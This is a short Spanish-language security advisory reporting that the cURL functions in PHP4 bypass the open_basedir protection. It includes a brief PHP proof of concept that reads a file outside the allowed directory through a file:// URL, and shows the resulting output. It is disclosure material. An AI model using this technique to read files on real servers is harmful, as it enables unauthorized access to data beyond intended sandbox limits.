====================================================
Asunto: PHP4: Funciones cURL sobrepasan open_basedir
Autor: frame at kernelpanik.org
Producto: PHP4 compilado con cURL (no probado en PHP5)
Fabricante: PHP/Zend
URL del fabricante: www.php.net
Tipo: Local
Riesgo: Low/Medium
BID: http://www.securityfocus.com/bid/11557 
=====================================================
 
Las funciones cURL en PHP4 sobrepasan la proteccion 
open_basedir, así que se puede navegar a través del 
sistema de ficheros sin ninguna limitación, más que
la inherente a los permisos del mismo.
 
Por ejemplo, configurando "open_basedir" en php.ini a
"/var/www/html" cualquiera puede leer "/etc/parla"
usando funciones de cURL.
 
== Demostración del concepto (curl.php)
<?php
$ch = curl_init("file:///etc/parla");
$file=curl_exec($ch);
echo $file
?>
 
== Demostración
$ cat /etc/parla
don't read please!
 
$ links -dump http://localhost/curltest/curl.php
don't read please!

== Línea de publicación
No hay línea de publicación

--
FraMe - frame at kernelpanik.org
http://www.kernelpanik.org